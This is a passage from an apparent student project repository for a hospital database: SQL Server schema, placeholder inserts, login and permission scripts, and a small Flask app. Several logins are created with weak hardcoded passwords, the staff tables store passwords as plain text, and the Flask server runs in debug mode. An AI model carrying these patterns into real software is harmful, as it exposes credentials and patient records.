@Id;\n\nEXEC dbo.ChkPatientHealthDetails 5;\n\n\n/*Using Grant permissions*/\n/*Giving grant permission for doctor on patient table and on health attribute table*/\n\nCREATE LOGIN TESTF0 WITH PASSWORD = 'abc@12345',\nDEFAULT_DATABASE = hospital;\nCREATE LOGIN TESTF1 WITH PASSWORD = 'def@12345',\nDEFAULT_DATABASE = hospital;\nCREATE LOGIN TESTF2 WITH PASSWORD = 'ghi@12345',\nDEFAULT_DATABASE = hospital;\nCREATE LOGIN TESTF3 WITH PASSWORD = 'jkl@12345',\nDEFAULT_DATABASE = hospital;\nCREATE LOGIN TESTF4 WITH PASSWORD = 'mno@12345',\nDEFAULT_DATABASE = hospital;\nCREATE LOGIN TESTF5 WITH PASSWORD = 'pqr@12345',\nDEFAULT_DATABASE = hospital;\nCREATE LOGIN TESTF6 WITH PASSWORD = 'stu@12345',\nDEFAULT_DATABASE = hospital;\nCREATE LOGIN TESTF7 WITH PASSWORD = 'vwx@12345',\nDEFAULT_DATABASE = hospital;\nCREATE LOGIN TESTF8 WITH PASSWORD = 'xyz@12345',\nDEFAULT_DATABASE = hospital;\nCREATE LOGIN TESTF9 WITH PASSWORD = 'adc@12345',\nDEFAULT_DATABASE = hospital;\n\ncreate user TESTF0 for login TESTF0 with Default_Schema = dbo;\ncreate user TESTF1 for login TESTF1 with Default_Schema = dbo;\ncreate user TESTF2 for login TESTF2 with Default_Schema = dbo;\ncreate user TESTF3 for login TESTF3 with Default_Schema = dbo;\ncreate user TESTF4 for login TESTF4 with Default_Schema = dbo;\ncreate user TESTF5 for login TESTF5 with Default_Schema = dbo;\ncreate user TESTF6 for login TESTF6 with Default_Schema = dbo;\ncreate user TESTF7 for login TESTF7 with Default_Schema = dbo;\ncreate user TESTF8 for login TESTF8 with Default_Schema = dbo;\ncreate user TESTF9 for login TESTF9 with Default_Schema = dbo;\n\nGrant insert,select,update,delete on Patient to TESTF0,TESTF1,TESTF2,TESTF3,TESTF4,TESTF5,TESTF6,TESTF7,TESTF8,TESTF9;\nGrant select on Health_Attribute to TESTF0,TESTF1,TESTF2,TESTF3,TESTF4,TESTF5,TESTF6,TESTF7,TESTF8,TESTF9;\n\nselect * from Nurse;\nUpdate Nurse SET FirstName = 'NURSE0' where FirstName = 'TESTF0';\nUpdate Nurse SET FirstName = 'NURSE1' where FirstName = 'TESTF1';\nUpdate Nurse SET FirstName = 'NURSE2' where FirstName = 'TESTF2';\nUpdate Nurse SET FirstName = 'NURSE3' where FirstName = 'TESTF3';\nUpdate Nurse SET FirstName = 'NURSE4' where FirstName = 'TESTF4';\nUpdate Nurse SET FirstName = 'NURSE5' where FirstName = 'TESTF5';\nUpdate Nurse SET FirstName = 'NURSE6' where FirstName = 'TESTF6';\nUpdate Nurse SET 
FirstName = 'NURSE7' where FirstName = 'TESTF7';\nUpdate Nurse SET FirstName = 'NURSE8' where FirstName = 'TESTF8';\nUpdate Nurse SET FirstName = 'NURSE9' where FirstName = 'TESTF9';\n\nCREATE LOGIN NURSE0 WITH PASSWORD = 'abc@12345',\nDEFAULT_DATABASE = hospital;\nCREATE LOGIN NURSE1 WITH PASSWORD = 'def@12345',\nDEFAULT_DATABASE = hospital;\nCREATE LOGIN NURSE2 WITH PASSWORD = 'ghi@12345',\nDEFAULT_DATABASE = hospital;\nCREATE LOGIN NURSE3 WITH PASSWORD = 'jkl@12345',\nDEFAULT_DATABASE = hospital;\nCREATE LOGIN NURSE4 WITH PASSWORD = 'mno@12345',\nDEFAULT_DATABASE = hospital;\nCREATE LOGIN NURSE5 WITH PASSWORD = 'pqr@12345',\nDEFAULT_DATABASE = hospital;\nCREATE LOGIN NURSE6 WITH PASSWORD = 'stu@12345',\nDEFAULT_DATABASE = hospital;\nCREATE LOGIN NURSE7 WITH PASSWORD = 'vwx@12345',\nDEFAULT_DATABASE = hospital;\nCREATE LOGIN NURSE8 WITH PASSWORD = 'xyz@12345',\nDEFAULT_DATABASE = hospital;\nCREATE LOGIN NURSE9 WITH PASSWORD = 'adc@12345',\nDEFAULT_DATABASE = hospital;\n\ncreate user NURSE0 for login NURSE0 with Default_Schema = dbo;\ncreate user NURSE1 for login NURSE1 with Default_Schema = dbo;\ncreate user NURSE2 for login NURSE2 with Default_Schema = dbo;\ncreate user NURSE3 for login NURSE3 with Default_Schema = dbo;\ncreate user NURSE4 for login NURSE4 with Default_Schema = dbo;\ncreate user NURSE5 for login NURSE5 with Default_Schema = dbo;\ncreate user NURSE6 for login NURSE6 with Default_Schema = dbo;\ncreate user NURSE7 for login NURSE7 with Default_Schema = dbo;\ncreate user NURSE8 for login NURSE8 with Default_Schema = dbo;\ncreate user NURSE9 for login NURSE9 with Default_Schema = dbo;\n\nGrant select on Health_Attribute to NURSE0,NURSE1,NURSE2,NURSE3,NURSE4,NURSE5,NURSE6,NURSE7,NURSE8,NURSE9;\n\n/*creating view on patient table*/\n/* If we want to grant part of information of patient table to Nurse.Then we can create a view on patient table and then it can be\nviewed by nurse*/\nselect * from patient;\nselect * from Nurse;\ncreate view patient_data AS\nselect Patient_ID,FirstName,LastName,Gender,Bed_ID\nfrom Patient\n\nselect * from patient_data;\n\ngrant select on patient_data to NURSE0,NURSE1,NURSE2,NURSE3,NURSE4,NURSE5,NURSE6,NURSE7,NURSE8,NURSE9;\n\n\n\n/* deleted not null for doctor_id and nurse_id as one of them only will be giving the medicine to patient */\ncreate table MedicineUseRecord(\n\tMUR_ID\t\t\t\tnvarchar(20) not null primary key,\n\tMedince_ID \t\t\tnvarchar(20) not null foreign key(Medince_ID) references Medicine(Medince_ID),\n\tDoctor_ID\t\t\tnvarchar(20) foreign key(Doctor_ID) references Doctor(Doctor_ID),\n\tNurse_ID \t\t\tnvarchar(20) foreign key(Nurse_ID) references Nurse(Nurse_ID),\n\tQuantity\t\t\tint not null check(Quantity > 0),--changed by aakruthi\n\tPatient_ID\t\t\tnvarchar(20) not null foreign key(Patient_ID) references Patient(Patient_ID),\n\tUsedDate\t\t\tdate not null\n);\ninsert MedicineUseRecord\nvalues (1,1,1,null,5,1,'2016/01/01'),\n(2,2,null,2,5,2,'2016/01/02'),\n(3,3,3,null,5,3,'2016/01/03'),\n(4,4,null,4,5,4,'2016/01/04'),\n(5,5,null,5,5,5,'2016/01/05'),\n(6,6,6,null,5,6,'2016/01/06'),\n(7,7,7,null,5,7,'2016/01/07'),\n(8,8,null,8,5,8,'2016/01/08'),\n(9,9,null,9,5,9,'2016/01/09'),\n(10,0,8,null,5,0,'2016/01/10');\n\n/* Given identity property to bill_id so the id gets auto generated and inserted values accordingly and in bill_detail\nchanged the bill_id to int */\ncreate table Bill(\n\tBill_ID\t\t\t\tint identity(1,1) not null primary key,\n\tPatient_ID \t\t\tnvarchar(20) not null foreign key(Patient_ID) references 
Patient(Patient_ID),\n\tBillTotal \t\t\tmoney,\n\tPaymentTotal\t\t\tmoney,\n\tInsuranceTotal\t\t\tmoney,\n\tPaymentDate\t\t\tdate\n);\ninsert Bill values\n(1,344,234,234,'2014/02/01'),\n(2,345,200,200,'2014/02/01'),\n(3,345,200,200,'2014/02/01'),\n(4,765,500,500,'2016/04/11'),\n(5,345,300,300,'2015/03/02'),\n(6,345,300,300,'2016/04/17'),\n(7,345,300,300,'2015/02/02'),\n(8,345,300,300,'2016/01/01'),\n(9,345,300,300,'2016/01/11');\n\n\ncreate table Bill_Detail(\n\tBillDetail_ID\t\tnvarchar(20) not null primary key,\n\tBill_ID \t\t\tint not null foreign key(Bill_ID) references Bill(Bill_ID),\n\tMedince_ID\t\t\tnvarchar(20) foreign key(Medince_ID) references Medicine(Medince_ID),/*changed by aakruthi.removed not null*/\n\tType\t\t\t\tnvarchar(20),\n\tTotal \t\t\t\tmoney,\n\tDate \t\t\t\tdate\n);\n\n\n \n\n \n\n"
},
{
"alpha_fraction": 0.650943398475647,
"alphanum_fraction": 0.650943398475647,
"avg_line_length": 18.363636016845703,
"blob_id": "e1533a9cb21e2eef7a5407d2346afa60fb283efa",
"content_id": "ac49405a46fcf0b92c5b864bf5c6cb59837300e2",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 212,
"license_type": "no_license",
"max_line_length": 49,
"num_lines": 11,
"path": "/Front-End/final/webserver.py",
"repo_name": "LEOBox/FinalProject",
"src_encoding": "UTF-8",
"text": "from flask import Flask,render_template\n\napp = Flask(__name__)\n\[email protected]('/index')\ndef index():\n\tpost = \"index\"\n\treturn render_template('index.html',post = post)\n\nif __name__ == '__main__':\n\tapp.run(debug=True)"
},
{
"alpha_fraction": 0.6938396692276001,
"alphanum_fraction": 0.7221940755844116,
"avg_line_length": 35.574073791503906,
"blob_id": "e7f8d5446f0b58fac562b5f178f2bf3da6427895",
"content_id": "8523ee18a6da66ac07ac974edfe356112ac0bdfc",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "SQL",
"length_bytes": 5925,
"license_type": "no_license",
"max_line_length": 120,
"num_lines": 162,
"path": "/Hospital.sql",
"repo_name": "LEOBox/FinalProject",
"src_encoding": "UTF-8",
"text": "--author:XD\n--Date: 03/26/2016\ncreate database Hospital\n\nuse Hospital;\n\ncreate table Supplier(\n\tSupplier_ID\t\t\tnvarchar(20) not null primary key,\n\tSupplier_Name\t\tnvarchar(30) not null,\n\tContactFirstName\tnvarchar(30) not null,\n\tContactLastName\t\tnvarchar(30) not null,\n\tPhone\t\t\t\tnvarchar(15) not null,\n\tEmail\t\t\t\tnvarchar(20) not null,\n\tAddress\t\t\t\tnvarchar(20) not null,\n\tCity\t\t\t\tnvarchar(15) not null,\n\tState\t\t\t\tnvarchar(10) not null\n);\n\n\ncreate table Medicine(\n\tMedince_ID \t\t\tnvarchar(20) not null primary key,\n\tName \t\t\t\tnvarchar(50) not null,\n\tSupplier_ID \t\tnvarchar(20) not null foreign key(Supplier_ID) references Supplier(Supplier_ID),\n\tUnitPrice \t\t\tmoney not null check(UnitPrice >= 0), --changed by aakruthi \n\tAvailableQuantity\tint not null,--changed by aakruthi\n\tDescription \t\ttext\n);\n\ncreate table Department(\n\tDepartmentID\t\tnvarchar(20) not null primary key,--changed by aakruthi\n\tName \t\t\t\tnvarchar(50) not null\n);\n\n\ncreate table Insurance(\n\tInsurance_ID \t\tnvarchar(20) not null primary key,\n\tName \t\t\t\tnvarchar(50) not null,\n\tTotal \t\t\t\tmoney not null check(Total > 0),\n\tDate \t\t\t\tdate not null,\n\tDescription \t\ttext\n);\n\ncreate table Bed(\n\tBed_ID \t\t\t\tnvarchar(20) not null primary key,\n\tBuilding \t\t\tnvarchar(50) not null,\n\tFloor \t\t\t\tint not null,\n\tUsed \t\t\t\tbit\n);\n\ncreate table Doctor(\n\tDoctor_ID\t\t\tnvarchar(20) not null primary key,\n\tFirstName \t\t\tnvarchar(30) not null,\n\tLastName \t\t\tnvarchar(30) not null,\n\tTitle\t\t\t\tnvarchar(20) not null,\n\tAge\t\t\t\t\tint not null check(Age >= 0),\n\tGender\t\t\t\tchar(1) not null check(Gender = 'F' or Gender = 'M'),\n\tDepartmentID\t\tnvarchar(20) not null foreign key(DepartmentID) references Department(DepartmentID),--changed by aakruthi\n\tPhone \t\t\t\tnvarchar(15) not null,\n\tEmail\t\t\t\tnvarchar(20) not null,\n\tReportToID \t\t\tnvarchar(20), --changed by aakruthi\n\tpassword\t\t\tnvarchar(256) not null\n);\n\ncreate table Nurse(\n\tNurse_ID\t\t\tnvarchar(20) not null primary key,\n\tFirstName \t\t\tnvarchar(30) not null,\n\tLastName \t\t\tnvarchar(30) not null,\n\tTitle\t\t\t\tnvarchar(20) not null,\n\tAge\t\t\t\t\tint not null check(Age >= 0),\n\tGender\t\t\t\tchar(1) not null check(Gender = 'F' or Gender = 'M'),\n\tDepartmentID\t\tnvarchar(20) not null foreign key(DepartmentID) references Department(DepartmentID),--changed by aakruthi\n\tPhone \t\t\t\tnvarchar(15) not null,\n\tEmail\t\t\t\tnvarchar(20) not null,\n\tReportToID\t\t\tnvarchar(20), --changed by aakruthi\n\tpassword\t\t\tnvarchar(256) not null\n);\n\n\ncreate table Patient(\n\tPatient_ID\t\t\tnvarchar(20) not null primary key,\n\tFirstName \t\t\tnvarchar(30) not null,\n\tLastName \t\t\tnvarchar(30) not null,\n\tGender\t\t\t\tchar(1) not null check(Gender = 'F' or Gender = 'M'),\n\tAge\t\t\t\t\tint not null check(Age >= 0),\n\tStatues\t\t\t\tchar(3) not null check(Statues = 'I' or Statues = 'II' or Statues = 'III' or Statues = 'IV'),\n\tPhone\t\t\t\tnvarchar(15) not null,\n\tEmail \t\t\t\tnvarchar(20) not null,\n\tDepartmentID\t\tnvarchar(20) not null foreign key(DepartmentID) references Department(DepartmentID),--changed by aakruthi\n\tBed_ID\t\t\t\tnvarchar(20) not null foreign key(Bed_ID) references Bed(Bed_ID),\n\tInsurance_ID\t\tnvarchar(20) not null foreign key(Insurance_ID) references Insurance(Insurance_ID)\n);\n\ncreate table Bill(\n\tBill_ID\t\t\t\tnvarchar(20) not null primary key,\n\tPatient_ID 
\t\t\tnvarchar(20) not null foreign key(Patient_ID) references Patient(Patient_ID),\n\tBillTotal \t\t\tmoney,\n\tPaymentTotal\t\tmoney,\n\tInsuranceTotal\t\tmoney,\n\tPaymentDate\t\t\tdate\n);\n\ncreate table Bill_Detail(\n\tBillDetail_ID\t\tnvarchar(20) not null primary key,\n\tBill_ID \t\t\tnvarchar(20) not null foreign key(Bill_ID) references Bill(Bill_ID),\n\tMedince_ID\t\t\tnvarchar(20) not null foreign key(Medince_ID) references Medicine(Medince_ID),\n\tType\t\t\t\tnvarchar(20),\n\tTotal \t\t\t\tmoney,\n\tDate \t\t\t\tdate\n);\n\ncreate table Contract(\n\tContract_ID\t\t\tnvarchar(20) not null primary key,\n\tSupplier_ID\t\t\tnvarchar(20) not null foreign key(Supplier_ID) references Supplier(Supplier_ID),\n\tMedince_ID\t\t\tnvarchar(20) not null foreign key(Medince_ID) references Medicine(Medince_ID),\n\tQuantity\t\t\tint not null check(Quantity > 0),--changed by aakruthi\n\tUnitPrice\t\t money not null check(UnitPrice >= 0),--changed by aakruthi\n\tInvoice\t\t\t\tas (UnitPrice*Quantity),--changed by aakruthi\n\tDate\t\t\t datetime not null default getdate(),--changed by aakruthi\n\tArriveDate\t\t\tdatetime\n);\n\ncreate table TreatmentTeam(\n\tPatient_ID\t\t\tnvarchar(20) not null foreign key(Patient_ID) references Patient(Patient_ID),\n\tDoctor_ID\t\t\tnvarchar(20) not null foreign key(Doctor_ID) references Doctor(Doctor_ID)\n);\n\ncreate table MedicineUseRecord(\n\tMUR_ID\t\t\t\tnvarchar(20) not null primary key,\n\tMedince_ID \t\t\tnvarchar(20) not null foreign key(Medince_ID) references Medicine(Medince_ID),\n\tDoctor_ID\t\t\tnvarchar(20) not null foreign key(Doctor_ID) references Doctor(Doctor_ID),\n\tNurse_ID \t\t\tnvarchar(20) not null foreign key(Nurse_ID) references Nurse(Nurse_ID),\n\tQuantity\t\t\tint not null check(Quantity > 0),--changed by aakruthi\n\tPatient_ID\t\t\tnvarchar(20) not null foreign key(Patient_ID) references Patient(Patient_ID),\n\tUsedDate\t\t\tdatetime not null default getdate()\n);\n\n\ncreate table Health_Attribute(\n\tHealth_ID \t\t\tnvarchar(20) not null primary key,\n\tPatient_ID \t\t\tnvarchar(20) not null foreign key(Patient_ID) references Patient(Patient_ID),\n\tSystolic_BP \t\tnvarchar(30) not null,\n\tDiastolic_BP \t\tnvarchar(30) not null,\n\tBloodSugar \t\t\tnvarchar(30) not null,\n\tPulse \t\t\t\tnvarchar(30) not null,\n\tDate \t\t\t\tdatetime not null default getdate()\n);\n\ncreate table Register(\n\tRegister_ID \t\tnvarchar(20) not null primary key,\n\tFirstName \t\t\tnvarchar(50) not null,\n\tLastName \t\t\tnvarchar(50) not null,\n\tDoctor_ID \t\t\tnvarchar(20) not null foreign key(Doctor_ID) references Doctor(Doctor_ID),\n\tDate \t\t\t\tdate not null \n);\n\ncreate table NurseSchedule(\n\tSchedule_ID \t\tnvarchar(20) not null primary key,\n\tNurse_ID \t\t\tnvarchar(20) not null foreign key(Nurse_ID) references Nurse(Nurse_ID),\n\tStartTime\t\t\tdatetime not null,\n\tEndTime \t\t\tdatetime not null,\n\tBed_ID \t\t\t\tnvarchar(20) foreign key(Bed_ID) references Bed(Bed_ID)\n);\n"
},
{
"alpha_fraction": 0.7005887031555176,
"alphanum_fraction": 0.7005887031555176,
"avg_line_length": 13.355262756347656,
"blob_id": "498dde93f3dd16527b5009c48ec76fc3b185fe4e",
"content_id": "fdb5ec37de075d0a2b36abbb2419a9e95775a35b",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "SQL",
"length_bytes": 1189,
"license_type": "no_license",
"max_line_length": 36,
"num_lines": 76,
"path": "/DCL.sql",
"repo_name": "LEOBox/FinalProject",
"src_encoding": "UTF-8",
"text": "CREATE LOGIN Doctor\r\n\tWITH PASSWORD = 'Inovator',\r\n\tDEFAULT_DATABASE = Hospital ;\r\n\r\nCREATE LOGIN Nurse\r\n\tWITH PASSWORD = 'Inovator',\r\n\tDEFAULT_DATABASE = Hospital;\r\n\r\nCREATE LOGIN Manager\r\n\tWITH PASSWORD = 'Inovator',\r\n\tDEFAULT_DATABASE = Hospital;\r\n\r\n\r\nUSE Hospital;\r\n\r\nCREATE USER Doctor\r\nFor Login Doctor;\r\n\r\nCREATE USER Nurse\r\nFor Login Nurse;\r\n\r\nCREATE USER Manager\r\nFor Login Manager;\r\n\r\n\r\n\r\nCREATE ROLE Doctor;\r\nCREATE ROLE Nurse;\r\n\r\n\r\n\r\n\r\n-- Grant permission to doctor\r\nGRANT SELECT, UPDATE, INSERT, DELETE\r\nON Doctor \r\nTO DOCTOR;\r\n\r\nGRANT SELECT, UPDATE, INSERT, DELETE\r\nON MedicineUseRecord \r\nTO DOCTOR;\r\n\r\nGRANT SELECT, UPDATE, INSERT, DELETE\r\nON TreatmentTeam \r\nTO DOCTOR;\r\n\r\nGRANT SELECT\r\nON Health_Attribute\r\nTO DOCTOR;\r\n\r\nGRANT SELECT, DELETE\r\nON Register\r\nTO Doctor;\r\n\r\n-- Grant permissions for Nurse\r\nGRANT SELECT, UPDATE, INSERT, DELETE\r\nON NurseSchedule\r\nTO Nurse;\r\n\r\nGRANT SELECT, UPDATE\r\nON MedicineUseRecord\r\nTO Nurse;\r\n\r\n\r\nGRANT SELECT, UPDATE, INSERT, DELETE\r\nON Nurse\r\nTO Nurse;\r\n\r\n-- Add members to roles\r\nALTER ROLE Doctor\r\nADD MEMBER DOCTOR;\r\n\r\nALTER ROLE Nurse\r\nADD MEMBER NURSE;\r\n\r\nALTER ROLE db_accessadmin\r\nADD MEMBER MANAGER;\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n"
},
{
"alpha_fraction": 0.3344064950942993,
"alphanum_fraction": 0.6012037992477417,
"avg_line_length": 35.243656158447266,
"blob_id": "f40425fa2540259ad670e617d5f01cedf2e68d34",
"content_id": "ac302db701e12bcdc4b029524bf998d5daa6d59b",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "SQL",
"length_bytes": 7144,
"license_type": "no_license",
"max_line_length": 97,
"num_lines": 197,
"path": "/insert.sql",
"repo_name": "LEOBox/FinalProject",
"src_encoding": "UTF-8",
"text": "--author = Aakruthi\nuse Hospital\n\ninsert Supplier values \n(0,'TEST0','TESTF0','TESTL0','123123123','[email protected]','TESTAddress','TESTCity','TESTState'),\n(1,'TEST1','TESTF1','TESTL1','123123123','[email protected]','TESTAddress','TESTCity','TESTState'),\n(2,'TEST2','TESTF2','TESTL2','123123123','[email protected]','TESTAddress','TESTCity','TESTState'),\n(3,'TEST3','TESTF3','TESTL3','123123123','[email protected]','TESTAddress','TESTCity','TESTState'),\n(4,'TEST4','TESTF4','TESTL4','123123123','[email protected]','TESTAddress','TESTCity','TESTState'),\n(5,'TEST5','TESTF5','TESTL5','123123123','[email protected]','TESTAddress','TESTCity','TESTState'),\n(6,'TEST6','TESTF6','TESTL6','123123123','[email protected]','TESTAddress','TESTCity','TESTState'),\n(7,'TEST7','TESTF7','TESTL7','123123123','[email protected]','TESTAddress','TESTCity','TESTState'),\n(8,'TEST8','TESTF8','TESTL8','123123123','[email protected]','TESTAddress','TESTCity','TESTState'),\n(9,'TEST9','TESTF9','TESTL9','123123123','[email protected]','TESTAddress','TESTCity','TESTState');\n\ninsert Medicine values\n(0,'TEST0',0,'12','120','TESTINFO'),\n(1,'TEST1',0,'12','120','TESTINFO'),\n(2,'TEST2',1,'12','120','TESTINFO'),\n(3,'TEST3',2,'12','120','TESTINFO'),\n(4,'TEST4',2,'12','120','TESTINFO'),\n(5,'TEST5',3,'12','120','TESTINFO'),\n(6,'TEST6',4,'12','120','TESTINFO'),\n(7,'TEST7',5,'12','120','TESTINFO'),\n(8,'TEST8',6,'12','120','TESTINFO'),\n(9,'TEST9',6,'12','120','TESTINFO');\n\ninsert Department values\n(0,'TEST0'),\n(1,'TEST1'),\n(2,'TEST2'),\n(3,'TEST3'),\n(4,'TEST4'),\n(5,'TEST5'),\n(6,'TEST6'),\n(7,'TEST7'),\n(8,'TEST8'),\n(9,'TEST9');\n\ninsert Insurance values\n(0,'TEST0',100,'2016/05/01','TESTINFO'),\n(1,'TEST1',200,'2016/05/02','TESTINFO'),\n(2,'TEST2',300,'2016/05/03','TESTINFO'),\n(3,'TEST3',400,'2016/05/03','TESTINFO'),\n(4,'TEST4',500,'2016/05/04','TESTINFO'),\n(5,'TEST5',600,'2016/05/05','TESTINFO'),\n(6,'TEST4',500,'2016/05/04','TESTINFO'),\n(7,'TEST4',500,'2016/05/04','TESTINFO'),\n(8,'TEST4',500,'2016/05/04','TESTINFO'),\n(9,'TEST4',500,'2016/05/04','TESTINFO');\n\ninsert Bed values\n(0,'1',2,1),\n(1,'1',1,0),\n(2,'2',1,0),\n(3,'2',3,1),\n(4,'3',4,1),\n(5,'2',3,1),\n(6,'2',3,1),\n(7,'2',3,1),\n(8,'2',3,1),\n(9,'2',3,1);\n\ninsert Doctor values\n(0,'TESTF0','TESTL0','Doc',30,'M',0,'123123123','TEST0@test',null,'testPas'),\n(1,'TESTF1','TESTL1','Doc',31,'F',0,'123123123','TEST0@test',0,'testPas'),\n(2,'TESTF2','TESTL2','Doc',31,'M',1,'123123123','TEST0@test',null,'testPas'),\n(3,'TESTF3','TESTL3','Doc',34,'F',1,'123123123','TEST0@test',2,'testPas'),\n(4,'TESTF4','TESTL4','Doc',34,'M',1,'123123123','TEST0@test',2,'testPas'),\n(5,'TESTF5','TESTL5','Doc',36,'M',2,'123123123','TEST0@test',null,'testPas'),\n(6,'TESTF6','TESTL6','Doc',37,'F',2,'123123123','TEST0@test',5,'testPas'),\n(7,'TESTF7','TESTL7','Doc',41,'F',1,'123123123','TEST0@test',null,'testPas'),\n(8,'TESTF8','TESTL8','Doc',29,'M',3,'123123123','TEST0@test',null,'testPas'),\n(9,'TESTF9','TESTL8','Doc',31,'M',4,'123123123','TEST0@test',null,'testPas');\n\ninsert Nurse 
values\n(0,'TESTF0','TESTL0','MISS',30,'M',0,'123123123','TEST0@test',null,'testPas'),\n(1,'TESTF1','TESTL1','MISS',31,'F',0,'123123123','TEST0@test',0,'testPas'),\n(2,'TESTF2','TESTL2','MISS',31,'M',1,'123123123','TEST0@test',null,'testPas'),\n(3,'TESTF3','TESTL3','MISS',34,'F',1,'123123123','TEST0@test',2,'testPas'),\n(4,'TESTF4','TESTL4','MISS',34,'M',1,'123123123','TEST0@test',2,'testPas'),\n(5,'TESTF5','TESTL5','MISS',36,'M',2,'123123123','TEST0@test',null,'testPas'),\n(6,'TESTF6','TESTL6','MISS',37,'F',2,'123123123','TEST0@test',5,'testPas'),\n(7,'TESTF7','TESTL7','MISS',41,'F',1,'123123123','TEST0@test',null,'testPas'),\n(8,'TESTF8','TESTL8','MISS',29,'M',3,'123123123','TEST0@test',null,'testPas'),\n(9,'TESTF9','TESTL9','MISS',31,'M',4,'123123123','TEST0@test',null,'testPas');\n\ninsert Patient values\n(0,'TESTF0','TESTL0','M',20,'I','123123123','TEST@test',0,0,0),\n(1,'TESTF1','TESTL1','F',89,'II','123123123','TEST@test',1,1,1),\n(2,'TESTF2','TESTL2','F',34,'III','123123123','TEST@test',1,2,2),\n(3,'TESTF3','TESTL3','M',45,'I','123123123','TEST@test',2,3,3),\n(4,'TESTF4','TESTL4','M',26,'IV','123123123','TEST@test',3,4,4),\n(5,'TESTF3','TESTL3','M',45,'I','123123123','TEST@test',2,3,3),\n(6,'TESTF3','TESTL3','M',45,'I','123123123','TEST@test',2,3,3),\n(7,'TESTF3','TESTL3','M',45,'I','123123123','TEST@test',2,3,3),\n(8,'TESTF3','TESTL3','M',45,'I','123123123','TEST@test',2,3,3),\n(9,'TESTF3','TESTL3','M',45,'I','123123123','TEST@test',2,3,3);\n\ninsert Bill values\n(0,0,0,0,0,null),\n(1,1,344,234,0,null),\n(2,2,345,100,0,null),\n(3,3,345,22,0,null),\n(4,4,7657,0,0,'2016/04/11'),\n(5,5,345,22,0,'2015/03/02'),\n(6,6,345,22,0,'2016/04/17'),\n(7,7,345,22,0,'2015/02/02'),\n(8,8,345,22,0,'2016/01/01'),\n(9,9,345,22,0,'2016/01/11');\n\ninsert Bill_Detail values\n(0,1,1,'Medicine',100,'2015/12/12'),\n(1,1,null,'Room',100,'2016/01/13'),\n(1,1,null,'Doc',100,'2016/02/10'),\n(2,2,null,'Doc',100,'2015/12/12'),\n(3,2,1,'Medicine',100,'2016/01/12'),\n(4,3,1,'Medicine',100,'2016/03/20'),\n(5,3,1,'Medicine',100,'2015/12/12'),\n(6,3,1,'Medicine',100,'2016/02/12'),\n(7,4,1,'Medicine',100,'2016/03/12'),\n(8,1,1,'Medicine',100,'2016/04/12'),\n(9,4,1,'Medicine',100,'2016/03/12');\n\ninsert into contract(Contract_ID,Supplier_ID,Medince_ID,Quantity,UnitPrice,Date)\nvalues (1,1,1,5,2,'2016/01/01'),\n(2,1,2,5,3,'2016/02/13'),\n(3,1,3,5,4,'2016/03/13'),\n(4,1,4,5,5,'2016/04/13'),\n(5,1,5,5,6,'2015/05/13'),\n(6,1,6,5,1,'2016/06/13'),\n(7,1,7,5,2,'2015/07/13'),\n(8,1,8,5,3,'2015/08/13'),\n(9,1,9,5,4,'2015/01/13'),\n(10,1,1,5,5,'2015/01/13');\n\ninsert into TreatmentTeam(Patient_ID,Doctor_ID)\nvalues (1,1),\n(2,2),\n(2,3),\n(3,4),\n(4,5),\n(5,6),\n(6,7),\n(7,8),\n(8,9),\n(1,10);\n\ninsert into MedicineUseRecord(MUR_ID,Medince_ID,Doctor_ID,Nurse_ID,Quantity,Patient_ID,UsedDate)\nvalues (1,1,1,1,5,1,'2016/01/01'),\n(2,2,2,2,5,2,'2016/01/02'),\n(3,3,3,3,5,3,'2016/01/03'),\n(4,4,4,4,5,4,'2016/01/04'),\n(5,5,5,5,5,5,'2016/01/05'),\n(6,6,6,6,5,6,'2016/01/06'),\n(7,7,7,7,5,7,'2016/01/07'),\n(8,8,8,8,5,8,'2016/01/08'),\n(9,9,9,9,5,9,'2016/01/09'),\n(10,10,10,10,5,10,'2016/01/10');\n\ninsert into Health_Attribute(Health_ID,Patient_ID,Systolic_BP,Diastolic_BP,BloodSugar,Pulse,Date)\nvalues 
(1,2,70,70,80,60,'2016-01-01'),\n(2,3,100,70,80,60,'2016-02-01'),\n(3,4,120,70,80,60,'2016-03-01'),\n(4,5,150,70,80,60,'2016-04-01'),\n(5,6,80,70,80,100,'2016-05-01'),\n(6,7,90,70,80,60,'2016-06-01'),\n(7,8,100,80,80,60,'2016-07-01'),\n(8,9,110,70,80,70,'2016-08-01'),\n(9,10,150,90,80,80,'2016-09-01'),\n(10,1,80,100,80,90,'2016-10-01');\n\n\n\ninsert into register(Register_ID,FirstName,LastName,Doctor_ID,Date)\nvalues (1,'xyz','defss',1,'2016-01-01'),\n(2,'ABC','test',2,'2016-01-02'),\n(3,'DEF','ESA',3,'2016-01-03'),\n(4,'GHI','TER',4,'2016-01-04'),\n(5,'JKL','QWE',5,'2016-01-05'),\n(6,'MNO','SQW',6,'2015-01-01'),\n(7,'PQR','ASX',7,'2015-01-02'),\n(8,'STU','QWQ',8,'2015-01-03'),\n(9,'VWX','sdf',9,'2015-01-04'),\n(10,'ADA','tests',2,'2015-01-05');\n\ninsert into NurseSchedule(Schedule_ID,Nurse_ID,StartTime,EndTime,Bed_ID)\nvalues (1,1,'6:00:00','15:00:00',1),\n(2,2,'6:00:00','15:00:00',1),\n(3,3,'6:00:00','15:00:00',1),\n(4,4,'6:00:00','15:00:00',1),\n(5,5,'6:00:00','15:00:00',1),\n(6,1,'15:00:00','21:00:00',1),\n(7,2,'6:00:00','21:00:00',1),\n(8,3,'21:00:00','6:00:00',1),\n(9,4,'21:00:00','6:00:00',1),\n(10,5,'21:00:00','6:00:00',1);\n\n\n\n\n"
}
] | 6 |
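A sketch of how an application could call the dbo.NurseTimings procedure defined in the first file above from Python, assuming a reachable SQL Server instance; the driver name, server, and credentials are placeholders:

import pyodbc

conn = pyodbc.connect(
    "DRIVER={ODBC Driver 17 for SQL Server};"
    "SERVER=localhost;DATABASE=Hospital;UID=Manager;PWD=Inovator"  # placeholders
)
cursor = conn.cursor()
cursor.execute("EXEC dbo.NurseTimings ?", "5")  # parameterized, avoids string pasting
for row in cursor.fetchall():
    print(row.FirstName, row.LastName, row.StartTime, row.EndTime)
conn.close()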
NastyHub/classtest
|
https://github.com/NastyHub/classtest
|
959fc5c1e183ce55899bea311c74e69fa3344057
|
89e0c7ae92fcd30bd1babb69fe7b9cf97fbb719b
|
